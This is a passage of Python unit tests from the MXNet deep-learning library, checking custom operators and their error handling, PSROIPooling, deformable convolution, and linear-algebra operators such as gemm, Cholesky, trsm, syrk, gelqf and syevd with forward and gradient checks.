return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
